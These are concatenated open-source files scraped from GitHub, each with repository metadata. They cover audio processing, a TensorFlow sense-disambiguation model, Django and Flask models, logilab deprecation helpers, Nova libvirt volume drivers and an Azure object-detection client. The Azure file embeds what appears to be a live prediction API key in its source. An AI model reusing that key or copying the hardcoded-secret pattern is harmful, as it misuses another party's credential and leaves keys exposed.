subprocess.call(["rm", inputfile])
def stretch(self, inputfile, outputfile):
command = [self.stretcher] + self.stretcherOpts
fileargs = ["-i", inputfile, "-o", outputfile]
subprocess.call(command + fileargs)
subprocess.call(["rm", inputfile])
if __name__ == '__main__':
import unittest
from tests.testaudioprocessor import TestAudioProcessor
TestAudioProcessor.header()
unittest.main()
| {
"content_hash": "f6b1f0bd952bc27bd52557df174e3d0c",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 68,
"avg_line_length": 29.02127659574468,
"alnum_prop": 0.5909090909090909,
"repo_name": "rumblesan/dronr",
"id": "e2e9d6a07caf4508abcc319570f1f4f28f7e5f42",
"size": "1387",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "audioprocessor.py",
"mode": "33261",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "4874"
}
],
"symlink_target": ""
} |
from abc import abstractclassmethod
import tensorflow as tf
from tensorflow.contrib.rnn import LSTMCell, LSTMStateTuple
from constant import WORD2VEC_EMB_DIMENSION, WORD2VEC_PATH
from data_loader import build_vocab, get_embedding_weights, get_word2vec_model, prepare_data, start_threads
LOGGER = None
class SimpleDisambiguator(object):
@abstractclassmethod
def fit(self, max_steps=None):
raise NotImplementedError("Implement this method")
@abstractclassmethod
def disambiguate(self, sentence_iterator):
raise NotImplementedError("Implement this method")
@abstractclassmethod
def score(self, test_data_iterator):
raise NotImplementedError("Implement this method")
class NeuralDisambiguator(SimpleDisambiguator):
def __init__(self, dataset, opts, use_pretrained_embeddings=True):
# TODO: Add Dropout layer later.
self.dropout_keep_prob = tf.placeholder(tf.float32, name="dropout_keep_prob")
if use_pretrained_embeddings:
word2vec = get_word2vec_model(WORD2VEC_PATH)
word2idx, idx2word, label2idx, idx2label = build_vocab(dataset.training_files, dataset.vocab_file, word2vec,
min_counts=opts['min_counts'])
embedding_weights = get_embedding_weights(word2idx, word2vec)
embedding_length = embedding_weights.shape[1]
# TODO: embedding might be trainable.
self.embeddings = tf.Variable(embedding_weights, dtype=tf.float32, trainable=False)
else:
word2idx, idx2word, label2idx, idx2label = build_vocab(dataset.training_files, dataset.vocab_file,
min_counts=opts['min_counts'])
embedding_length = opts['embedding_length']
self.embeddings = tf.Variable(tf.random_uniform([len(word2idx), embedding_length], -1.0, 1.0),
dtype=tf.float32)
self.sess = tf.Session()
self.enqueue_data, self.source, self.target_word, self.label, \
self.sequence_length = prepare_data(self.sess, dataset.training_files, word2idx, label2idx, **opts)
self.target_words_embedded = tf.nn.embedding_lookup(self.embeddings, self.target_word)
self.sentences_embedded = tf.nn.embedding_lookup(self.embeddings, self.source)
hidden_unit_size = opts['hidden_unit_size']
num_senses = len(label2idx)
encoder_cell = LSTMCell(hidden_unit_size)
(encoder_fw_outputs, encoder_bw_outputs), (encoder_fw_final_state, encoder_bw_final_state) = \
tf.nn.bidirectional_dynamic_rnn(cell_fw=encoder_cell, cell_bw=encoder_cell, inputs=self.sentences_embedded,
sequence_length=self.sequence_length, dtype=tf.float32, time_major=True)
encoder_final_state_c = tf.concat((encoder_fw_final_state.c, encoder_bw_final_state.c), 1)
encoder_final_state_h = tf.concat((encoder_fw_final_state.h, encoder_bw_final_state.h), 1)
encoder_final_state = LSTMStateTuple(c=encoder_final_state_c, h=encoder_final_state_h)
# self.encoder_target_embedding = encoder_final_state.c
self.encoder_target_embedding = tf.concat((encoder_final_state.c, self.target_words_embedded), 1)
with tf.name_scope("output"):
W = tf.Variable(tf.truncated_normal([hidden_unit_size * 2 + embedding_length, num_senses],
stddev=0.1), name="W")
b = tf.Variable(tf.constant(0.1, shape=[num_senses]), name="b")
self.scores = tf.matmul(self.encoder_target_embedding, W) + b
self.predictions = tf.argmax(self.scores, 1, name="predictions")
with tf.name_scope('cross_entropy'):
labels = tf.one_hot(self.label, num_senses)
self.diff = tf.nn.softmax_cross_entropy_with_logits(labels=labels, logits=self.scores)
with tf.name_scope('loss'):
self.loss = tf.reduce_mean(self.diff)
with tf.name_scope('train'):
self.train_step = tf.train.AdamOptimizer(opts['learning_rate']).minimize(self.loss)
with tf.name_scope('accuracy'):
with tf.name_scope('correct_prediction'):
correct_prediction = tf.equal(self.predictions, tf.argmax(labels, 1))
with tf.name_scope('accuracy'):
self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
self.sess.run(tf.global_variables_initializer())
def disambiguate(self, test_data_iterator):
pass
def fit(self, max_steps=1000):
coord = tf.train.Coordinator()
enqueue_threads = start_threads(self.enqueue_data, [coord, ])
threads = tf.train.start_queue_runners(sess=self.sess, coord=coord)
threads.extend(enqueue_threads)
try:
for i in range(max_steps):
_, loss = self.sess.run([self.train_step, self.loss])
if i % 100 == 0:
print(i, loss)
except tf.errors.OutOfRangeError:
print("Done training")
except KeyboardInterrupt:
print("Force stop.")
coord.request_stop()
coord.join(threads)
def score(self, test_data_iterator):
pass
| {
"content_hash": "bb42fc8d2e0bb2db099970c31d561242",
"timestamp": "",
"source": "github",
"line_count": 122,
"max_line_length": 120,
"avg_line_length": 43.942622950819676,
"alnum_prop": 0.6282409998134676,
"repo_name": "osmanbaskaya/coarse-wsd",
"id": "a79279e900ccecbbcdef3f4625852968b82f8842",
"size": "5361",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "coarse-wsd/disambiguate/model.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Java",
"bytes": "8026"
},
{
"name": "Makefile",
"bytes": "5421"
},
{
"name": "Python",
"bytes": "103973"
}
],
"symlink_target": ""
} |
import arrow
from betterapis import db
class Review(db.Model, SimpleSerializing):
id = db.Column(db.Integer, primary_key=True)
talk_id = db.Column(db.Integer)
details = db.Column(db.String)
def __init__(self, **kwargs):
self.talk_id = kwargs.get('talk_id')
self.details = kwargs.get('details')
def update(self, **kwargs):
self.__init__(**kwargs)
def __repr__(self):
return '<Review {} {}>'.format(self.talk_id, self.details)
| {
"content_hash": "3c05fa1c5535f8c92f6ad0f46f3b88aa",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 66,
"avg_line_length": 28.529411764705884,
"alnum_prop": 0.6164948453608248,
"repo_name": "tylerdave/OpenAPI-Tutorial",
"id": "50c420bd261223ce358c2e19e2f2549d1edd1f28",
"size": "485",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lessons/lesson-2.05/models_solution.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2528"
},
{
"name": "HTML",
"bytes": "55368"
},
{
"name": "Python",
"bytes": "8999"
}
],
"symlink_target": ""
} |
import time
import os
import getopt
import sys
class Log:
"""规范日志类"""
fn = ''
au = ''
dt = ''
con = ''
def __init__(self):
current_date = self.fetch_current_date()
self.fn = current_date + '.md'
self.au = 'Lu Hao'
self.dt = current_date
self.con = self.fetch_template_content()
self.generate_log_file()
def check_file_exist(self):
cur_dir_list = os.listdir(os.getcwd())
if cur_dir_list.count(self.fn) == 0:
return False
return True
def fetch_current_date(self):
return time.strftime('%Y-%m-%d')
def fetch_template_content(self):
f = open('template.txt', 'r')
tpl = f.read()
return tpl
def replace_template_content(self):
self.con = self.con.replace('DATE', self.dt)
self.con = self.con.replace('AUTHOR', self.au)
def generate_log_file(self):
if self.check_file_exist():
print u'文件已存在 TuT'
else:
f = open(self.fn, 'w')
self.replace_template_content()
f.write(self.con)
print u'文件已生成 ^V^'
if __name__ == '__main__':
# python scriptname.py -f 'hello' --directory-prefix=/home -t --form at 'a' 'b'
shortargs = 'f:t'
longargs = ['directory-prefix=', 'format', '--f_long=']
opts, args = getopt.getopt(sys.argv[1:], shortargs, longargs)
log = Log()
| {
"content_hash": "4a909ad450469f58665569f93ffcd682",
"timestamp": "",
"source": "github",
"line_count": 56,
"max_line_length": 83,
"avg_line_length": 25.446428571428573,
"alnum_prop": 0.5417543859649123,
"repo_name": "lhzbxx/QiLe2",
"id": "9b4b3ed20b81d0605e8c875e27ea840cfcd34f4e",
"size": "1622",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "devlog/generator.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "37"
},
{
"name": "CSS",
"bytes": "33433"
},
{
"name": "HTML",
"bytes": "28253"
},
{
"name": "JavaScript",
"bytes": "9749"
},
{
"name": "Python",
"bytes": "26528"
}
],
"symlink_target": ""
} |
"""Deprecation utilities
:author: Logilab
:copyright: 2006-2008 LOGILAB S.A. (Paris, FRANCE)
:contact: http://www.logilab.fr/ -- mailto:[email protected]
"""
__docformat__ = "restructuredtext en"
import sys
from warnings import warn
from clonedigger.logilab.common.modutils import LazyObject, load_module_from_name
class deprecated(type):
"""metaclass to print a warning on instantiation of a deprecated class"""
def __call__(cls, *args, **kwargs):
msg = getattr(cls, "__deprecation_warning__",
"%s is deprecated" % cls.__name__)
warn(msg, DeprecationWarning, stacklevel=2)
return type.__call__(cls, *args, **kwargs)
def class_renamed(old_name, new_class, message=None):
"""automatically creates a class which fires a DeprecationWarning
when instantiated.
>>> Set = class_renamed('Set', set, 'Set is now replaced by set')
>>> s = Set()
sample.py:57: DeprecationWarning: Set is now replaced by set
s = Set()
>>>
"""
clsdict = {}
if message is None:
message = '%s is deprecated' % old_name
clsdict['__deprecation_warning__'] = message
try:
# new-style class
return deprecated(old_name, (new_class,), clsdict)
except (NameError, TypeError):
# old-style class
class DeprecatedClass(new_class):
"""FIXME: There might be a better way to handle old/new-style class
"""
def __init__(self, *args, **kwargs):
warn(message, DeprecationWarning, stacklevel=2)
new_class.__init__(self, *args, **kwargs)
return DeprecatedClass
def class_moved(new_class, old_name=None, message=None):
"""nice wrapper around class_renamed when a class has been moved into
another module
"""
if old_name is None:
old_name = new_class.__name__
if message is None:
message = 'class %s is now available as %s.%s' % (
old_name, new_class.__module__, new_class.__name__)
return class_renamed(old_name, new_class, message)
def deprecated_function(new_func, message=None):
"""creates a function which fires a DeprecationWarning when used
For example, if <bar> is deprecated in favour of <foo> :
>>> bar = deprecated_function(foo, 'bar is deprecated')
>>> bar()
sample.py:57: DeprecationWarning: bar is deprecated
bar()
>>>
"""
if message is None:
message = "this function is deprecated, use %s instead" % (
new_func.func_name)
def deprecated(*args, **kwargs):
warn(message, DeprecationWarning, stacklevel=2)
return new_func(*args, **kwargs)
return deprecated
def moved(modpath, objname):
"""use to tell that a callable has been moved to a new module.
It returns a callable wrapper, so that when its called a warning is printed
telling where the object can be found, import is done (and not before) and
the actual object is called.
NOTE: the usage is somewhat limited on classes since it will fail if the
wrapper is use in a class ancestors list, use the `class_moved` function
instead (which has no lazy import feature though).
"""
def callnew(*args, **kwargs):
message = "object %s has been moved to module %s" % (objname, modpath)
warn(message, DeprecationWarning, stacklevel=2)
m = load_module_from_name(modpath)
return getattr(m, objname)(*args, **kwargs)
return callnew
class WarnLazyObject(LazyObject):
def __init__(self, oldname, newname):
# XXX doesn't work if module isn't in a package
package, module = newname.rsplit('.', 1)
super(WarnLazyObject, self).__init__(package, module)
self.oldname = oldname
self.newname = newname
print 'hop', oldname, newname
sys.modules[oldname] = self
def __getobj(self):
if self._imported is None:
message = "module %s has moved, it's now %s" % (
self.oldname, self.newname)
warn(message, DeprecationWarning, stacklevel=2)
return super(WarnLazyObject, self).__getobj()
module_moved = WarnLazyObject
def obsolete(reason="This function is obsolete"):
"""this function is an alternative to `deprecated_function`
when there's no real replacement for the deprecated function
"""
def newdecorator(func):
def wrapped(*args, **kwargs):
warn(reason, DeprecationWarning, stacklevel=2)
return func(*args, **kwargs)
return wrapped
return newdecorator
| {
"content_hash": "892f3538cccf63faea1a71bfad40a15f",
"timestamp": "",
"source": "github",
"line_count": 132,
"max_line_length": 81,
"avg_line_length": 34.833333333333336,
"alnum_prop": 0.6346237494562853,
"repo_name": "h2oloopan/easymerge",
"id": "7045e260cd168fc708bad81248bc4893830dac9f",
"size": "5297",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "EasyMerge/clonedigger/logilab/common/deprecation.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "13487"
},
{
"name": "CSS",
"bytes": "416664"
},
{
"name": "D",
"bytes": "2012"
},
{
"name": "Java",
"bytes": "583078"
},
{
"name": "JavaScript",
"bytes": "285692"
},
{
"name": "Python",
"bytes": "4212549"
},
{
"name": "Ruby",
"bytes": "920"
},
{
"name": "Shell",
"bytes": "40508"
},
{
"name": "TeX",
"bytes": "114952"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('visit', '0050_auto_20150810_2027'),
]
operations = [
migrations.AlterField(
model_name='staff',
name='is_visit_1_trained',
field=models.DateField(null=True, blank=True),
),
migrations.AlterField(
model_name='staff',
name='is_visit_2_trained',
field=models.DateField(null=True, blank=True),
),
]
| {
"content_hash": "a406ac07b9c219981ece98e8b4e491b1",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 58,
"avg_line_length": 24.652173913043477,
"alnum_prop": 0.5731922398589065,
"repo_name": "koebbe/homeworks",
"id": "413238285ad98fa0290b295ae3ca229a94679e92",
"size": "591",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "visit/migrations/0051_auto_20150810_2033.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "44210"
},
{
"name": "HTML",
"bytes": "69003"
},
{
"name": "JavaScript",
"bytes": "124572"
},
{
"name": "Python",
"bytes": "223075"
}
],
"symlink_target": ""
} |
from setuptools import setup, find_packages
from mimiron import __version__
setup(
name='mimiron',
version=__version__,
description="Easily manage your tfvars config via Mimiron",
url='https://github.com/ImageIntelligence/mimiron',
author='David Vuong',
author_email='[email protected]',
classifiers=[
'Intended Audience :: Developers',
'Environment :: Console',
'Topic :: Utilities',
'Programming Language :: Python :: 2 :: Only',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
],
packages=find_packages(exclude=['contrib', 'docs', 'test*']),
install_requires=[
'docopt==0.6.2',
'terminaltables==3.1.0',
'jsonschema==2.6.0',
'GitPython==2.1.8',
'requests==2.13.0',
'humanize==0.5.1',
'python-dateutil==2.6.0',
],
include_package_data=True,
package_data={'': ['README.md']},
entry_points={
'console_scripts': [
'mim=mimiron.command_line:main',
],
},
)
| {
"content_hash": "f84c4dd42c483a64dd3d981d3d0e1eb0",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 65,
"avg_line_length": 24.954545454545453,
"alnum_prop": 0.569216757741348,
"repo_name": "ImageIntelligence/mimiron",
"id": "8a6be46e0a0d16460dcba2bad3b6a2ec05d2e986",
"size": "1144",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "27905"
}
],
"symlink_target": ""
} |
"""Volume drivers for libvirt."""
import os
from os_brick.initiator import connector
from oslo_concurrency import processutils
from oslo_config import cfg
from oslo_log import log as logging
import six
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
from nova.i18n import _LW
from nova import paths
from nova import utils
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import utils as libvirt_utils
LOG = logging.getLogger(__name__)
volume_opts = [
cfg.IntOpt('num_iscsi_scan_tries',
default=5,
help='Number of times to rescan iSCSI target to find volume'),
cfg.IntOpt('num_iser_scan_tries',
default=5,
help='Number of times to rescan iSER target to find volume'),
cfg.StrOpt('rbd_user',
help='The RADOS client name for accessing rbd volumes'),
cfg.StrOpt('rbd_secret_uuid',
help='The libvirt UUID of the secret for the rbd_user'
'volumes'),
cfg.StrOpt('nfs_mount_point_base',
default=paths.state_path_def('mnt'),
help='Directory where the NFS volume is mounted on the'
' compute node'),
cfg.StrOpt('nfs_mount_options',
help='Mount options passed to the NFS client. See section '
'of the nfs man page for details'),
cfg.BoolOpt('iscsi_use_multipath',
default=False,
help='Use multipath connection of the iSCSI volume'),
cfg.BoolOpt('iser_use_multipath',
default=False,
help='Use multipath connection of the iSER volume'),
cfg.ListOpt('qemu_allowed_storage_drivers',
default=[],
help='Protocols listed here will be accessed directly '
'from QEMU. Currently supported protocols: [gluster]'),
cfg.StrOpt('iscsi_iface',
deprecated_name='iscsi_transport',
help='The iSCSI transport iface to use to connect to target in '
'case offload support is desired. Default format is of '
'the form <transport_name>.<hwaddress> where '
'<transport_name> is one of (be2iscsi, bnx2i, cxgb3i, '
'cxgb4i, qla4xxx, ocs) and <hwadress> is the MAC address '
'of the interface and can be generated via the '
'iscsiadm -m iface command. Do not confuse the '
'iscsi_iface parameter to be provided here with the '
'actual transport name.'),
# iser is also supported, but use LibvirtISERVolumeDriver
# instead
]
CONF = cfg.CONF
CONF.register_opts(volume_opts, 'libvirt')
class LibvirtBaseVolumeDriver(object):
"""Base class for volume drivers."""
def __init__(self, connection, is_block_dev):
self.connection = connection
self.is_block_dev = is_block_dev
def get_config(self, connection_info, disk_info):
"""Returns xml for libvirt."""
conf = vconfig.LibvirtConfigGuestDisk()
conf.driver_name = libvirt_utils.pick_disk_driver_name(
self.connection._host.get_version(),
self.is_block_dev
)
conf.source_device = disk_info['type']
conf.driver_format = "raw"
conf.driver_cache = "none"
conf.target_dev = disk_info['dev']
conf.target_bus = disk_info['bus']
conf.serial = connection_info.get('serial')
# Support for block size tuning
data = {}
if 'data' in connection_info:
data = connection_info['data']
if 'logical_block_size' in data:
conf.logical_block_size = data['logical_block_size']
if 'physical_block_size' in data:
conf.physical_block_size = data['physical_block_size']
# Extract rate_limit control parameters
if 'qos_specs' in data and data['qos_specs']:
tune_opts = ['total_bytes_sec', 'read_bytes_sec',
'write_bytes_sec', 'total_iops_sec',
'read_iops_sec', 'write_iops_sec']
specs = data['qos_specs']
if isinstance(specs, dict):
for k, v in six.iteritems(specs):
if k in tune_opts:
new_key = 'disk_' + k
setattr(conf, new_key, v)
else:
LOG.warn(_LW('Unknown content in connection_info/'
'qos_specs: %s'), specs)
# Extract access_mode control parameters
if 'access_mode' in data and data['access_mode']:
access_mode = data['access_mode']
if access_mode in ('ro', 'rw'):
conf.readonly = access_mode == 'ro'
else:
LOG.error(_LE('Unknown content in '
'connection_info/access_mode: %s'),
access_mode)
raise exception.InvalidVolumeAccessMode(
access_mode=access_mode)
return conf
def _get_secret_uuid(self, conf, password=None):
secret = self.connection._host.find_secret(conf.source_protocol,
conf.source_name)
if secret is None:
secret = self.connection._host.create_secret(conf.source_protocol,
conf.source_name,
password)
return secret.UUIDString()
def _delete_secret_by_name(self, connection_info):
source_protocol = connection_info['driver_volume_type']
netdisk_properties = connection_info['data']
if source_protocol == 'rbd':
return
elif source_protocol == 'iscsi':
usage_type = 'iscsi'
usage_name = ("%(target_iqn)s/%(target_lun)s" %
netdisk_properties)
self.connection._host.delete_secret(usage_type, usage_name)
def connect_volume(self, connection_info, disk_info):
"""Connect the volume. Returns xml for libvirt."""
pass
def disconnect_volume(self, connection_info, disk_dev):
"""Disconnect the volume."""
pass
class LibvirtVolumeDriver(LibvirtBaseVolumeDriver):
"""Class for volumes backed by local file."""
def __init__(self, connection):
super(LibvirtVolumeDriver,
self).__init__(connection, is_block_dev=True)
def get_config(self, connection_info, disk_info):
"""Returns xml for libvirt."""
conf = super(LibvirtVolumeDriver,
self).get_config(connection_info, disk_info)
conf.source_type = "block"
conf.source_path = connection_info['data']['device_path']
return conf
class LibvirtFakeVolumeDriver(LibvirtBaseVolumeDriver):
"""Driver to attach fake volumes to libvirt."""
def __init__(self, connection):
super(LibvirtFakeVolumeDriver,
self).__init__(connection, is_block_dev=True)
def get_config(self, connection_info, disk_info):
"""Returns xml for libvirt."""
conf = super(LibvirtFakeVolumeDriver,
self).get_config(connection_info, disk_info)
conf.source_type = "network"
conf.source_protocol = "fake"
conf.source_name = "fake"
return conf
class LibvirtNetVolumeDriver(LibvirtBaseVolumeDriver):
"""Driver to attach Network volumes to libvirt."""
def __init__(self, connection):
super(LibvirtNetVolumeDriver,
self).__init__(connection, is_block_dev=False)
def get_config(self, connection_info, disk_info):
"""Returns xml for libvirt."""
conf = super(LibvirtNetVolumeDriver,
self).get_config(connection_info, disk_info)
netdisk_properties = connection_info['data']
conf.source_type = "network"
conf.source_protocol = connection_info['driver_volume_type']
conf.source_name = netdisk_properties.get('name')
conf.source_hosts = netdisk_properties.get('hosts', [])
conf.source_ports = netdisk_properties.get('ports', [])
auth_enabled = netdisk_properties.get('auth_enabled')
if (conf.source_protocol == 'rbd' and
CONF.libvirt.rbd_secret_uuid):
conf.auth_secret_uuid = CONF.libvirt.rbd_secret_uuid
auth_enabled = True # Force authentication locally
if CONF.libvirt.rbd_user:
conf.auth_username = CONF.libvirt.rbd_user
if conf.source_protocol == 'iscsi':
try:
conf.source_name = ("%(target_iqn)s/%(target_lun)s" %
netdisk_properties)
target_portal = netdisk_properties['target_portal']
except KeyError:
raise exception.NovaException(_("Invalid volume source data"))
ip, port = utils.parse_server_string(target_portal)
if ip == '' or port == '':
raise exception.NovaException(_("Invalid target_lun"))
conf.source_hosts = [ip]
conf.source_ports = [port]
if netdisk_properties.get('auth_method') == 'CHAP':
auth_enabled = True
conf.auth_secret_type = 'iscsi'
password = netdisk_properties.get('auth_password')
conf.auth_secret_uuid = self._get_secret_uuid(conf, password)
if auth_enabled:
conf.auth_username = (conf.auth_username or
netdisk_properties['auth_username'])
conf.auth_secret_type = (conf.auth_secret_type or
netdisk_properties['secret_type'])
conf.auth_secret_uuid = (conf.auth_secret_uuid or
netdisk_properties['secret_uuid'])
return conf
def disconnect_volume(self, connection_info, disk_dev):
"""Detach the volume from instance_name."""
super(LibvirtNetVolumeDriver,
self).disconnect_volume(connection_info, disk_dev)
self._delete_secret_by_name(connection_info)
class LibvirtISCSIVolumeDriver(LibvirtBaseVolumeDriver):
"""Driver to attach Network volumes to libvirt."""
def __init__(self, connection):
super(LibvirtISCSIVolumeDriver, self).__init__(connection,
is_block_dev=True)
# Call the factory here so we can support
# more than x86 architectures.
self.connector = connector.InitiatorConnector.factory(
'ISCSI', utils._get_root_helper(),
use_multipath=CONF.libvirt.iscsi_use_multipath,
device_scan_attempts=CONF.libvirt.num_iscsi_scan_tries,
transport=self._get_transport())
def _get_transport(self):
if CONF.libvirt.iscsi_iface:
transport = CONF.libvirt.iscsi_iface
else:
transport = 'default'
return transport
def get_config(self, connection_info, disk_info):
"""Returns xml for libvirt."""
conf = super(LibvirtISCSIVolumeDriver,
self).get_config(connection_info, disk_info)
conf.source_type = "block"
conf.source_path = connection_info['data']['device_path']
return conf
def connect_volume(self, connection_info, disk_info):
"""Attach the volume to instance_name."""
LOG.debug("Calling os-brick to attach iSCSI Volume")
device_info = self.connector.connect_volume(connection_info['data'])
LOG.debug("Attached iSCSI volume %s", device_info)
connection_info['data']['device_path'] = device_info['path']
def disconnect_volume(self, connection_info, disk_dev):
"""Detach the volume from instance_name."""
LOG.debug("calling os-brick to detach iSCSI Volume")
self.connector.disconnect_volume(connection_info['data'], None)
LOG.debug("Disconnected iSCSI Volume %s", disk_dev)
super(LibvirtISCSIVolumeDriver,
self).disconnect_volume(connection_info, disk_dev)
class LibvirtISERVolumeDriver(LibvirtISCSIVolumeDriver):
"""Driver to attach Network volumes to libvirt."""
def __init__(self, connection):
super(LibvirtISERVolumeDriver, self).__init__(connection)
# Call the factory here so we can support
# more than x86 architectures.
self.connector = connector.InitiatorConnector.factory(
'ISER', utils._get_root_helper(),
use_multipath=CONF.libvirt.iser_use_multipath,
device_scan_attempts=CONF.libvirt.num_iser_scan_tries,
transport=self._get_transport())
def _get_transport(self):
return 'iser'
class LibvirtNFSVolumeDriver(LibvirtBaseVolumeDriver):
"""Class implements libvirt part of volume driver for NFS."""
def __init__(self, connection):
"""Create back-end to nfs."""
super(LibvirtNFSVolumeDriver,
self).__init__(connection, is_block_dev=False)
def _get_device_path(self, connection_info):
path = os.path.join(CONF.libvirt.nfs_mount_point_base,
utils.get_hash_str(connection_info['data']['export']))
path = os.path.join(path, connection_info['data']['name'])
return path
def get_config(self, connection_info, disk_info):
"""Returns xml for libvirt."""
conf = super(LibvirtNFSVolumeDriver,
self).get_config(connection_info, disk_info)
conf.source_type = 'file'
conf.source_path = connection_info['data']['device_path']
conf.driver_format = connection_info['data'].get('format', 'raw')
return conf
def connect_volume(self, connection_info, disk_info):
"""Connect the volume. Returns xml for libvirt."""
options = connection_info['data'].get('options')
self._ensure_mounted(connection_info['data']['export'], options)
connection_info['data']['device_path'] = \
self._get_device_path(connection_info)
def disconnect_volume(self, connection_info, disk_dev):
"""Disconnect the volume."""
export = connection_info['data']['export']
mount_path = os.path.join(CONF.libvirt.nfs_mount_point_base,
utils.get_hash_str(export))
try:
utils.execute('umount', mount_path, run_as_root=True)
except processutils.ProcessExecutionError as exc:
if ('device is busy' in exc.message or
'target is busy' in exc.message):
LOG.debug("The NFS share %s is still in use.", export)
else:
LOG.exception(_LE("Couldn't unmount the NFS share %s"), export)
def _ensure_mounted(self, nfs_export, options=None):
"""@type nfs_export: string
@type options: string
"""
mount_path = os.path.join(CONF.libvirt.nfs_mount_point_base,
utils.get_hash_str(nfs_export))
if not libvirt_utils.is_mounted(mount_path, nfs_export):
self._mount_nfs(mount_path, nfs_export, options, ensure=True)
return mount_path
def _mount_nfs(self, mount_path, nfs_share, options=None, ensure=False):
"""Mount nfs export to mount path."""
utils.execute('mkdir', '-p', mount_path)
# Construct the NFS mount command.
nfs_cmd = ['mount', '-t', 'nfs']
if CONF.libvirt.nfs_mount_options is not None:
nfs_cmd.extend(['-o', CONF.libvirt.nfs_mount_options])
if options:
nfs_cmd.extend(options.split(' '))
nfs_cmd.extend([nfs_share, mount_path])
try:
utils.execute(*nfs_cmd, run_as_root=True)
except processutils.ProcessExecutionError as exc:
if ensure and 'already mounted' in exc.message:
LOG.warn(_LW("%s is already mounted"), nfs_share)
else:
raise
| {
"content_hash": "fd82a0917fe9ba2e46232e1433ccdea7",
"timestamp": "",
"source": "github",
"line_count": 392,
"max_line_length": 79,
"avg_line_length": 41.109693877551024,
"alnum_prop": 0.5851690971144896,
"repo_name": "ruslanloman/nova",
"id": "192f4b3be9acd5799db55bccc6aeabbab3c1665c",
"size": "16814",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nova/virt/libvirt/volume/volume.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "16289904"
},
{
"name": "Shell",
"bytes": "20716"
},
{
"name": "Smarty",
"bytes": "283675"
}
],
"symlink_target": ""
} |
"""Interface to Azure object proposals."""
from __future__ import absolute_import, division, print_function
import requests
import utool as ut
import numpy as np
from six.moves import zip
from os.path import abspath, dirname, expanduser, join, exists # NOQA
(print, rrr, profile) = ut.inject2(__name__, '[azure]')
VERBOSE_AZURE = ut.get_argflag('--verbazure') or ut.VERBOSE
NPROC_MULTIPLIER = 2
PREDICTION_URL = 'https://southcentralus.api.cognitive.microsoft.com/customvision/v2.0/Prediction/%s/image?iterationId=%s'
PREDICTION_HEADER = {
'Prediction-Key': None,
'Content-Type': 'application/octet-stream'
}
PREDICTION_DICT = {
None : ('9bb5790b-7f59-4c0b-b571-21e68d29f4b2', 'a4fb7280-b0be-4706-91c6-7651d116ac46', '34e5c511adfc449290e10868218906f9'),
}
def detect_gid_list(ibs, gid_list, verbose=VERBOSE_AZURE, **kwargs):
"""Detect gid_list with azure.
Args:
gid_list (list of int): the list of IBEIS image_rowids that need detection
Kwargs (optional): refer to the Azure documentation for configuration settings
Args:
ibs (ibeis.IBEISController): image analysis api
gid_list (list of int): the list of IBEIS image_rowids that need detection
Kwargs:
detector, config_filepath, weights_filepath, verbose
Yields:
tuple: (gid, gpath, result_list)
"""
# Get new gpaths if downsampling
config = {
'draw_annots': False,
'thumbsize': 900,
}
gpath_list = ibs.get_image_thumbpath(gid_list, ensure_paths=True, **config)
size_list = ibs.get_image_sizes(gid_list)
# Run detection
results_iter = detect(gpath_list, verbose=verbose, **kwargs)
# Upscale the results
_iter = zip(gid_list, size_list, results_iter)
for gid, size, (gpath, result_list) in _iter:
width, height = size
# Upscale the results back up to the original image size
for result in result_list:
result['xtl'] = int(np.around(result['xtl'] * width ))
result['ytl'] = int(np.around(result['ytl'] * height))
result['width'] = int(np.around(result['width'] * width ))
result['height'] = int(np.around(result['height'] * height))
yield (gid, gpath, result_list)
def _detect(gpath, prediction_project, prediction_iteration, prediction_model):
with open(gpath, 'rb') as image_file:
data = image_file.read()
prediction_url = PREDICTION_URL % (prediction_project, prediction_iteration, )
prediction_header = PREDICTION_HEADER.copy()
prediction_header['Prediction-Key'] = prediction_model
response = requests.post(url=prediction_url, data=data, headers=prediction_header)
response_json = response.json()
output_list = response_json['predictions']
return output_list
def detect(gpath_list, config_filepath, verbose=VERBOSE_AZURE, **kwargs):
"""Detect image filepaths with azure.
Args:
gpath_list (list of str): the list of image paths that need proposal candidates
Kwargs (optional): refer to the Azure documentation for configuration settings
Returns:
iter
"""
# Get correct weight if specified with shorthand
if config_filepath not in PREDICTION_DICT:
config_filepath = None
prediction = PREDICTION_DICT.get(config_filepath, None)
assert prediction is not None, 'Azure needs to have a model configuration'
prediction_project, prediction_iteration, prediction_model = prediction
prediction_project_list = [prediction_project] * len(gpath_list)
prediction_iteration_list = [prediction_iteration] * len(gpath_list)
prediction_model_list = [prediction_model] * len(gpath_list)
arg_iter = list(zip(gpath_list, prediction_project_list, prediction_iteration_list, prediction_model_list))
nprocs = ut.util_parallel.get_default_numprocs()
nprocs *= NPROC_MULTIPLIER
nprocs = min(nprocs, len(arg_iter))
outputs_list = ut.util_parallel.generate2(_detect, arg_iter, nprocs=nprocs, ordered=True)
# Execute detector for each image
results_list_ = []
for output_list in outputs_list:
result_list_ = []
for output in list(output_list):
